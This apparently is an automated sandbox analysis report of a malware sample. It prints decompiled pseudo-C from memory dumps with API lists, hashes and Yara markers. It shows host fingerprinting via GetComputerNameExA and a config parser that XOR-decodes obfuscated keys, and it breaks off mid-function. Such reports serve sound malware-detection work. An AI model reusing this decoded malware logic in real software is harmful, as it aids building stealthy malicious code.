                                                                                                                                                                                                                                0x00a6107d
                                                                                                                                                                                                                                0x00a6107d
                                                                                                                                                                                                                                0x00a6107d
                                                                                                                                                                                                                                0x00a6108c
                                                                                                                                                                                                                                0x00a61095
                                                                                                                                                                                                                                0x00a6109a
                                                                                                                                                                                                                                0x00a610b8
                                                                                                                                                                                                                                0x00a61114
                                                                                                                                                                                                                                0x00a610ba
                                                                                                                                                                                                                                0x00a610c0
                                                                                                                                                                                                                                0x00a610c6
                                                                                                                                                                                                                                0x00a610d4
                                                                                                                                                                                                                                0x00a610d8
                                                                                                                                                                                                                                0x00a610df
                                                                                                                                                                                                                                0x00a610e8
                                                                                                                                                                                                                                0x00a610ec
                                                                                                                                                                                                                                0x00a610f2
                                                                                                                                                                                                                                0x00a61103
                                                                                                                                                                                                                                0x00a610f4
                                                                                                                                                                                                                                0x00a610fa
                                                                                                                                                                                                                                0x00a610fa
                                                                                                                                                                                                                                0x00a610f2
                                                                                                                                                                                                                                0x00a6110b
                                                                                                                                                                                                                                0x00a6110b
                                                                                                                                                                                                                                0x00a61116

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExitThreadlstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2636182767-0
                                                                                                                                                                                                                                • Opcode ID: a4f11c3ee2d2a1a1c3ef4e0c7b97038839184275894bfa084de759586603372b
                                                                                                                                                                                                                                • Instruction ID: 42197435e6c70c002835b4e4e1e8116af5ba63e1e77b215bd3504a60b1322c8a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4f11c3ee2d2a1a1c3ef4e0c7b97038839184275894bfa084de759586603372b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2011C4725083059FDB11DBB4DC49E977BFCEB0A305F0A4A2AF155C3161EB70E5858B52
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A9779A, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A9779A(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E00A963D1(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0xa9d270, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E00A96FA6(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                                                                                                                                                                                                                                0x00a9779a
                                                                                                                                                                                                                                0x00a977a2
                                                                                                                                                                                                                                0x00a977b9
                                                                                                                                                                                                                                0x00a977d4
                                                                                                                                                                                                                                0x00a977d8
                                                                                                                                                                                                                                0x00a977dd
                                                                                                                                                                                                                                0x00a977df
                                                                                                                                                                                                                                0x00a977f1
                                                                                                                                                                                                                                0x00a977fd
                                                                                                                                                                                                                                0x00a977e1
                                                                                                                                                                                                                                0x00a977e1
                                                                                                                                                                                                                                0x00a977e6
                                                                                                                                                                                                                                0x00a977eb
                                                                                                                                                                                                                                0x00a977eb
                                                                                                                                                                                                                                0x00a977df
                                                                                                                                                                                                                                0x00a97803
                                                                                                                                                                                                                                0x00a97807
                                                                                                                                                                                                                                0x00a97807
                                                                                                                                                                                                                                0x00a977ae
                                                                                                                                                                                                                                0x00a977b3
                                                                                                                                                                                                                                0x00a977b7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A96FA6: SysFreeString.OLEAUT32(00000000), ref: 00A97009
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,747DF710,?,00000000,?,00000000,?,00A9296F,?,004F0053,04FD9370,00000000,?), ref: 00A977FD
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Free$HeapString
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3806048269-1536154274
                                                                                                                                                                                                                                • Opcode ID: ff9ff556b026a809fb029b7f3513385af6cc91d56dd9b699c0100f07b90460cd
                                                                                                                                                                                                                                • Instruction ID: 9f29d793b9669524f8b35a97c19f994398c0c484f65c996a2b5cc0fba603d57e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff9ff556b026a809fb029b7f3513385af6cc91d56dd9b699c0100f07b90460cd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD01FB72614519BBCF229F94DD05FEE7BA6EF48790F148029FE099A120D731D960DBE0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A9508C, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                			E00A9508C(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E00A95157(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E00A953BB(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                                                                                                                                                                                                0x00a95091
                                                                                                                                                                                                                                0x00a9509c
                                                                                                                                                                                                                                0x00a9509e
                                                                                                                                                                                                                                0x00a950a4
                                                                                                                                                                                                                                0x00a950a6
                                                                                                                                                                                                                                0x00a950ab
                                                                                                                                                                                                                                0x00a950b4
                                                                                                                                                                                                                                0x00a950b8
                                                                                                                                                                                                                                0x00a950c1
                                                                                                                                                                                                                                0x00a950c5
                                                                                                                                                                                                                                0x00a950d4
                                                                                                                                                                                                                                0x00a950c7
                                                                                                                                                                                                                                0x00a950c8
                                                                                                                                                                                                                                0x00a950cd
                                                                                                                                                                                                                                0x00a950cd
                                                                                                                                                                                                                                0x00a950c5
                                                                                                                                                                                                                                0x00a950b8
                                                                                                                                                                                                                                0x00a950dd

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetComputerNameExA.KERNEL32(00000003,00000000,00A9A5F2,747DF710,00000000,?,?,00A9A5F2), ref: 00A950A4
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • GetComputerNameExA.KERNEL32(00000003,00000000,00A9A5F2,00A9A5F3,?,?,00A9A5F2), ref: 00A950C1
                                                                                                                                                                                                                                  • Part of subcall function 00A953BB: RtlFreeHeap.NTDLL(00000000,00000000,00A912FA,00000000,?,?,00000000), ref: 00A953C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ComputerHeapName$AllocateFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 187446995-0
                                                                                                                                                                                                                                • Opcode ID: 69cce440c44e0104c2a6f103eb883d11dbbe3f5ff0eaccc8a9bca861b7108f32
                                                                                                                                                                                                                                • Instruction ID: 021ed910463006f29a70fd41cdb921656d65d3fc70b6a55cd8d655aa6c83f30f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69cce440c44e0104c2a6f103eb883d11dbbe3f5ff0eaccc8a9bca861b7108f32
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6EF03026B00609AFEF12D6AA8D06EAF66EC9FC5750F210069B504D7140EA70DE069BB0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A9596A, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xa9d274) == 0) {
						E00A91F47();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xa9d274) == 1) {
						_t10 = E00A94D07(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                                                                                                                                                                                                0x00a95971
                                                                                                                                                                                                                                0x00a95972
                                                                                                                                                                                                                                0x00a95975
                                                                                                                                                                                                                                0x00a959a7
                                                                                                                                                                                                                                0x00a959a9
                                                                                                                                                                                                                                0x00a959a9
                                                                                                                                                                                                                                0x00a95977
                                                                                                                                                                                                                                0x00a95978
                                                                                                                                                                                                                                0x00a9598d
                                                                                                                                                                                                                                0x00a95994
                                                                                                                                                                                                                                0x00a95996
                                                                                                                                                                                                                                0x00a95996
                                                                                                                                                                                                                                0x00a95994
                                                                                                                                                                                                                                0x00a95978
                                                                                                                                                                                                                                0x00a959b1

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(00A9D274), ref: 00A9597F
                                                                                                                                                                                                                                  • Part of subcall function 00A94D07: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,00A95992,?), ref: 00A94D1A
                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(00A9D274), ref: 00A9599F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3834848776-0
                                                                                                                                                                                                                                • Opcode ID: 27c84dae52dd8d71792af2f39addcd458bd29096c88364ac737e0fb5dd4b268b
                                                                                                                                                                                                                                • Instruction ID: c3e2196e7ab6ebf7a945beca17805e65a7e644d1cb5e74acc4c15f72ab9bd1ac
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27c84dae52dd8d71792af2f39addcd458bd29096c88364ac737e0fb5dd4b268b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAE08631B44926FBEF3357F4CD0AB5EA6D1AB11BB0F124515B481D2050C610CC42C3B3
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A96FA6, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 34%
                                                                                                                                                                                                                                			E00A96FA6(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xa9d2e0; // 0x453a5a8
				_t4 = _t15 + 0xa9e39c; // 0x4fd8944
				_t20 = _t4;
				_t6 = _t15 + 0xa9e124; // 0x650047
				_t17 = E00A96B85(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E00A9A3CC(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                                                                                                                                                                                                0x00a96fb0
                                                                                                                                                                                                                                0x00a96fb7
                                                                                                                                                                                                                                0x00a96fb8
                                                                                                                                                                                                                                0x00a96fb9
                                                                                                                                                                                                                                0x00a96fba
                                                                                                                                                                                                                                0x00a96fc0
                                                                                                                                                                                                                                0x00a96fc5
                                                                                                                                                                                                                                0x00a96fc5
                                                                                                                                                                                                                                0x00a96fcf
                                                                                                                                                                                                                                0x00a96fe1
                                                                                                                                                                                                                                0x00a96fe8
                                                                                                                                                                                                                                0x00a97016
                                                                                                                                                                                                                                0x00a96fea
                                                                                                                                                                                                                                0x00a96fec
                                                                                                                                                                                                                                0x00a96ff1
                                                                                                                                                                                                                                0x00a97013
                                                                                                                                                                                                                                0x00a96ff3
                                                                                                                                                                                                                                0x00a96ff6
                                                                                                                                                                                                                                0x00a96ffd
                                                                                                                                                                                                                                0x00a97002
                                                                                                                                                                                                                                0x00a97004
                                                                                                                                                                                                                                0x00a97004
                                                                                                                                                                                                                                0x00a97009
                                                                                                                                                                                                                                0x00a97009
                                                                                                                                                                                                                                0x00a96ff1
                                                                                                                                                                                                                                0x00a9701d

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A96B85: SysFreeString.OLEAUT32(?), ref: 00A96C64
                                                                                                                                                                                                                                  • Part of subcall function 00A9A3CC: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00A91CB7,004F0053,00000000,?), ref: 00A9A3D5
                                                                                                                                                                                                                                  • Part of subcall function 00A9A3CC: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00A91CB7,004F0053,00000000,?), ref: 00A9A3FF
                                                                                                                                                                                                                                  • Part of subcall function 00A9A3CC: memset.NTDLL ref: 00A9A413
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A97009
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 397948122-0
                                                                                                                                                                                                                                • Opcode ID: 1664b6bbcaacd15807a242c09f4dd347498353785089fb3eaa30a11669d9d399
                                                                                                                                                                                                                                • Instruction ID: a75ee03a66f6102a2f2e373b81cd42918f7af5a2b7ca12c61ed6619ea5b3f540
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1664b6bbcaacd15807a242c09f4dd347498353785089fb3eaa30a11669d9d399
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C019A32600019BFDF11DFA8CD41DAEBBF8EB08360F000425E901E7061E770AA1697E0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A9AB22, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A9AB22() {

				E00A9ABE6(0xa9c344, 0xa9d134); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                0x00a9ab19
                                                                                                                                                                                                                                0x00a9ab20

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A9AB19
                                                                                                                                                                                                                                  • Part of subcall function 00A9ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A9AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: 71b39ffc72625da20d475d9dffb6d658f18b76366e25b4ff5473c0de6693a89e
                                                                                                                                                                                                                                • Instruction ID: b27b592c5aab64419d1c09ec4f25c1df61143569722c5afb9f195a23b42f3460
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71b39ffc72625da20d475d9dffb6d658f18b76366e25b4ff5473c0de6693a89e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35B0129235E001BD3D04510C2E03C3741DEC0D0B20330C52FF000C9140D8401C4100B3
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A9AB07, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A9AB07() {

				E00A9ABE6(0xa9c344, 0xa9d124); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                0x00a9ab19
                                                                                                                                                                                                                                0x00a9ab20

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A9AB19
                                                                                                                                                                                                                                  • Part of subcall function 00A9ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A9AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: e6bc68d3f568120d0e04df177617f373ee941cdea1bd229a18c2cad49818ed4f
                                                                                                                                                                                                                                • Instruction ID: 36bb9518ea9ea9e4624162a577ce21fddcef4e51cb61d1a6b00e71a185e0c420
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6bc68d3f568120d0e04df177617f373ee941cdea1bd229a18c2cad49818ed4f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EB012A235C001BD3D0411082E43C3701DDC0E0B20330C52FF000C8041D4411C4100B3
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A614A8, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                			E00A614A8(void* __eax, intOrPtr _a4) {

				 *0xa641d0 =  *0xa641d0 & 0x00000000;
				_push(0);
				_push(0xa641cc);
				_push(1);
				_push(_a4);
				 *0xa641c8 = 0xc; // executed
				L00A61AEC(); // executed
				return __eax;
			}



                                                                                                                                                                                                                                0x00a614a8
                                                                                                                                                                                                                                0x00a614af
                                                                                                                                                                                                                                0x00a614b1
                                                                                                                                                                                                                                0x00a614b6
                                                                                                                                                                                                                                0x00a614b8
                                                                                                                                                                                                                                0x00a614bc
                                                                                                                                                                                                                                0x00a614c6
                                                                                                                                                                                                                                0x00a614cb

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00A61091,00000001,00A641CC,00000000), ref: 00A614C6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DescriptorSecurity$ConvertString
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3907675253-0
                                                                                                                                                                                                                                • Opcode ID: 72d6130fbda3d66dab92a570d5b826d171369bdaa7a7ba1839b17b7ce24a1b07
                                                                                                                                                                                                                                • Instruction ID: d600a89fb677c2c200f6a0a7b2df7d1df0c5690437a18f9f8531be453efdd221
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72d6130fbda3d66dab92a570d5b826d171369bdaa7a7ba1839b17b7ce24a1b07
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DBC04CB4145301A7E710DBC0DC46F167E71777A709F100704F500241D1C3F910D59515
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A95157, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A95157(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xa9d270, 0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                0x00a95163
                                                                                                                                                                                                                                0x00a95169

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: b757cee320c2eeb944e4e51c898a7bccb446a5a809eb3d8d64b3bdf74f473f08
                                                                                                                                                                                                                                • Instruction ID: 59b1f0c78546974e1dcf1727f02c31366257dc74dd2f4f7081b5478abc601e14
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b757cee320c2eeb944e4e51c898a7bccb446a5a809eb3d8d64b3bdf74f473f08
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10B012B1200100FBCE11CB90DF09F057B31B750700F014013B20540070CA315466EB04
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 00A9235B, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                			E00A9235B(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0xa9d2dc; // 0x69b25f44
				if(E00A9A43F( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0xa9d310 = _v8;
				}
				_t33 =  *0xa9d2dc; // 0x69b25f44
				if(E00A9A43F( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0xa9d2dc; // 0x69b25f44
				if(E00A9A43F( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0xa9d270, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0xa9d2dc; // 0x69b25f44
						_t45 = E00A9A7ED(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0xa9d278 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0xa9d2dc; // 0x69b25f44
						_t46 = E00A9A7ED(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0xa9d27c = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0xa9d2dc; // 0x69b25f44
						_t47 = E00A9A7ED(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0xa9d280 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0xa9d2dc; // 0x69b25f44
						_t48 = E00A9A7ED(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0xa9d004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0xa9d2dc; // 0x69b25f44
						_t49 = E00A9A7ED(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
